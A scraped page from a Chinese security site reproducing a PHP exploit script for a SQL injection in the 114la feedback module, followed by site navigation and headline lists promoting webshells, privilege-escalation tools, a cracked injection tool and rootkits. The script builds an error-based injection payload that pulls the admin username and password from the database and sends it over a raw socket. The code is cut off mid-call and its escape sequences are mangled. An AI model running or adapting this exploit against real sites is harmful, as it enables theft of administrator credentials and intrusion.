<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
 
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
 
ob_start(); 
$url = $argv[1];
$path= $argv[2];
 
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
 
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://$url/#Mrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite
                
               



               

            

            

            


				


          
共2页: 
上一页
1
2
下一页

				
            
			
 




            




                        
Tags： 





                分享至:

                

                

                

                

                

                

                

                

                

            



            



            



 











    
最新图文资讯



    



        



        



        



        



        



        



    











    


		


			


			
行尸走肉第二季确定播出时间

			


			


			
mysql官方网站被黑并获得了ROOT权限

			


			


			
dedecms官方模板包含一句话木马

			


			


			
星外提权辅助工具

			


	



    


		


			


			
顶级网站扫描工具WVS最新版下载

			


			


			
全球最大中文淫秽色情网站联盟被天朝和谐

			


			


			
alucar php webshell

			


			


			
mysql udf提权原理和提权案例分析 udf提权木马下载

			


    



    


		


			


			
科讯kesion 6.x–7.06 SQL注射漏洞VBS版利用工具第二版

			


			


			
T00ls Lpk Sethc最新v2.0版

			


			


			
关于udf跟mix提权

			


			


			
乔布斯最恨的黑客揭秘

			


    



    


		


			


			
Wordpress暴最新严重漏洞

			


			


			
内网渗透案例

			


			


			
index.dat泄露你上网痕迹

			


			


			
两个比较好用的旁注工具

			


    



    


		


			


			
Mssql和Mysql注入神器

			


			


			
gh0st源码免杀安全卫士

			


			


			
Havij 1.15 Pro最新破解版

			


			


			
6月23日Discuz!多版本爆存储型XSS脚本漏洞 (0day)

			


    



    


		


			


			
 深入阐述WPA-PSK-TKIP及AES的破解

			


			


			
推荐不错的rookit MAFIX - Linux 2.6 rootkit

			


			


			
Linux下ARP欺骗嗅探内部渗透测试

			


			


			
高级后门技巧:在IIS留后门的方法 实战IIS后门

			


    



    







   







                        




                
相关文章列表:



                


					
mysql SQL Error: 1146, SQLState: 42S02 (linux)[转
mysql SQL Error: 1146, SQLState: 42S02 (linux)
php后台插一句话的思路
poj 1141 dp解法
HDU 1147 Pick-up sticks
poj 3114 强连通+缩点+记忆化搜索


				



            















          


          

          

          

          



验证码:





理智评论文明上网，拒绝恶意谩骂



用户名：

 匿名发表

				

 





    

			















	

	


			



				

				


				


			

	














    



    




        


			


            

		







    
推荐内容



    
 

    	

    

































    
最新文章



    


    	
linux下nmap的使用-linux网络扫描技术
dedecms 5.5 0day 转载
PHP推荐禁用函数disable_functions PHP安全配置
Aspcms 1.5 COOKIES注入0day
（CentOS+Nginx+PHP+Mysql）配置和WEB服务器安全配置
espcms最新注入0day
emseasy最新注入漏洞
史上最全的各个脚本的一句话木马
Linux 递归经典：fork 炸弹
phpcms 2008最新0day加批量EXP代码 2011年11月
SiteServer 3.4.4最新SQL注入0day
ECSHOP 2.7.2最新盲注漏洞
C语言之父丹尼斯·里奇也登船了
微软WP7手机系统摄像头非法跟踪用户坐标
黑客称德国绿坝时时监控网络用户


    





        


			

            
            
            

		







    













关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明  -  发展历史









   
Copyright © 2010-2015  Linux安全网 LinuxSo.Com, All Rights Reserved. 豫ICP备12027123号-1